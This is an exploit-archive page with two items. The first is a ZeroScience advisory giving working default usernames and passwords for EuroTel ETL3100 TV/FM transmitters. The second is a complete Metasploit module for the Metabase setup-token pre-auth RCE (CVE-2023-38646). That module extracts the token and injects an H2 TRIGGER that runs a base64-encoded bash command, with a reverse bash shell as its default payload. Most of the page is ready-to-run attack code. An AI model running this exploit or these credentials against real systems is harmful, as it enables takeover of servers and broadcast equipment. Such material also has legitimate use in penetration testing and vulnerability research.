    EuroTel ETL3100 Transmitter Default CredentialsVendor: EuroTel S.p.A. | SIEL, Sistemi Elettronici S.R.LProduct web page: https://www.eurotel.it | https://www.siel.fmAffected version: v01c01 (Microprocessor: socs0t10/ats01s01, Model: ETL3100 Exciter)                   v01x37 (Microprocessor: socs0t08/socs0s08, Model: ETL3100RT Exciter)Summary: RF Technology For Television Broadcasting Applications.The Series ETL3100 Radio Transmitter provides all the necessaryfeatures defined by the FM and DAB standards. Two bands are providedto easily complain with analog and digital DAB standard. The SeriesETL3100 Television Transmitter provides all the necessary featuresdefined by the DVB-T, DVB-H, DVB-T2, ATSC and ISDB-T standards, aswell as the analog TV standards. Three band are provided to easilycomplain with all standard channels, and switch softly from analog-TV'world' to DVB-T/H, DVB-T2, ATSC or ISDB-T transmission.Desc: The TV and FM transmitter uses a weak set of default administrativecredentials that can be guessed in remote password attacks and gain fullcontrol of the system.Tested on: GNU/Linux Ubuntu 3.0.0+ (GCC 4.3.3)           lighttpd/1.4.26           PHP/5.4.3           Xilinx Virtex MachineVulnerability discovered by Gjoko 'LiquidWorm' Krstic                            @zeroscienceAdvisory ID: ZSL-2023-5782Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5782.php29.04.2023--Using Username "user" and Password "etl3100rt1234" the operator will enter in the WEB interface in a read-only mode.Using Username "operator" and Password "2euro21234" the operator will be able also to modify some parameters in the WEB pages.

EuroTel ETL3100 Transmitter Default Credentials

Metabase versions before 0.46.6.1 contain a flaw where the secret setup-token is accessible even after the setup process has been completed. With this token a user is able to submit the setup functionality to create a new database. When creating a new database, an H2 database string is created with a TRIGGER that allows for code execution. We use a sample database for our connection string to prevent corrupting real databases. Successfully tested against Metabase 0.46.6.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Metabase Setup Token RCE',        'Description' => %q{          Metabase versions before 0.46.6.1 contain a flaw where the secret setup-token          is accessible even after the setup process has been completed. With this token          a user is able to submit the setup functionality to create a new database.          When creating a new database, an H2 database string is created with a TRIGGER          that allows for code execution. We use a sample database for our connection          string to prevent corrupting real databases.          Successfully tested against Metabase 0.46.6.        },        'License' => MSF_LICENSE,        'Author' => [          'h00die', # msf module          'Maxwell Garrett', # original PoC, analysis          'Shubham Shah' # original PoC, analysis        ],        'References' => [          ['URL', 'https://blog.assetnote.io/2023/07/22/pre-auth-rce-metabase/'],          ['URL', 'https://www.metabase.com/blog/security-advisory'],          ['CVE', '2023-38646']        ],        'Platform' => ['unix'],        'Privileged' => false,        'Arch' => ARCH_CMD,        'DefaultOptions' => {          'PAYLOAD' => 'cmd/unix/reverse_bash'          # for docker payload/cmd/unix/reverse_netcat also works, but no perl/python        },        'Targets' => [          [ 'Automatic Target', {}]        ],        'DisclosureDate' => '2023-07-22',        'DefaultTarget' => 0,        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [IOC_IN_LOGS]        }      )    )    register_options(      [        Opt::RPORT(3000),        OptString.new('TARGETURI', [ true, 'The URI of the Metabase Application', '/'])      ]    )  end  def get_bootstrap_json_blob_from_html_resp(html)    %r{<script type="application/json" id="_metabaseBootstrap">([^>]+)</script>} =~ html    begin      JSON.parse(Regexp.last_match(1))    rescue JSON::ParserError, TypeError      print_bad('Unable to parse JSON blob')      nil    end  end  def check    res = send_request_cgi(      'uri' => normalize_uri(target_uri.path),      'method' => 'GET'    )    return CheckCode::Unknown("#{peer} - Could not connect to web service - no response") if res.nil?    return CheckCode::Unknown("#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") unless res.code == 200    json = get_bootstrap_json_blob_from_html_resp(res.body)    fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected response, unable to load JSON blob") if json.nil?    version = json.dig('version', 'tag')    return CheckCode::Unknown("#{peer} - Unable to determine version from JSON blob") if version.nil?    # typically v0.46.6    version = version.gsub('v', '')    if Rex::Version.new(version) < Rex::Version.new('0.46.6.1')      return CheckCode::Appears("Version Detected: #{version}")    end    CheckCode::Safe("Version not vulnerable: #{version}")  end  def exploit    res = send_request_cgi(      'uri' => normalize_uri(target_uri.path),      'method' => 'GET'    )    fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service") if res.nil?    fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected response (response code: #{res.code})") unless res.code == 200    json = get_bootstrap_json_blob_from_html_resp(res.body)    fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected response, unable to load JSON blob") if json.nil?    setup_token = json['setup-token']    if setup_token.nil?      print_status('Setup token is nil, checking secondary location')      res = send_request_cgi(        'uri' => normalize_uri(target_uri.path, 'api', 'session', 'properties'),        'method' => 'GET'      )      fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service") if res.nil?      fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected response (response code: #{res.code})") unless res.code == 200      json = res.get_json_document      setup_token = json['setup-token']    end    fail_with(Failure::UnexpectedReply, "#{peer} - Unable to find valid setup-token") if setup_token.nil?    print_good("Found setup token: #{setup_token}")    print_status('Sending exploit (may take a few seconds)')    # our base64ed payload can't have = in it, so we'll pad out with spaces to remove them    b64_pe = ::Base64.strict_encode64(payload.encoded)    equals_count = b64_pe.count('=')    if equals_count > 0      b64_pe = ::Base64.strict_encode64(payload.encoded + ' ' * equals_count)    end    send_request_cgi(      'uri' => normalize_uri(target_uri.path, 'api', 'setup', 'validate'),      'method' => 'POST',      'ctype' => 'application/json',      'data' => {        'token' => setup_token,        'details' =>          {            # 'is_on_demand' => false, # without this, the shell takes ~20 sec longer to get            # 'is_full_sync' => false,            # 'is_sample' => false,            # 'cache_ttl' => nil,            # 'refingerprint' => false,            # 'auto_run_queries' => true,            # 'schedules' => {},            'details' =>              {                'db' => "zip:/app/metabase.jar!/sample-database.db;TRACE_LEVEL_SYSTEM_OUT=0\\;CREATE TRIGGER #{Rex::Text.rand_text_alpha_upper(6..12)} BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\njava.lang.Runtime.getRuntime().exec('bash -c {echo,#{b64_pe}}|{base64,-d}|{bash,-i}')\n$$--=x",                'advanced-options' => false,                'ssl' => true              },            'name' => Rex::Text.rand_text_alphanumeric(6..12),            'engine' => 'h2'          }      }.to_json    )  endend

Tag

#web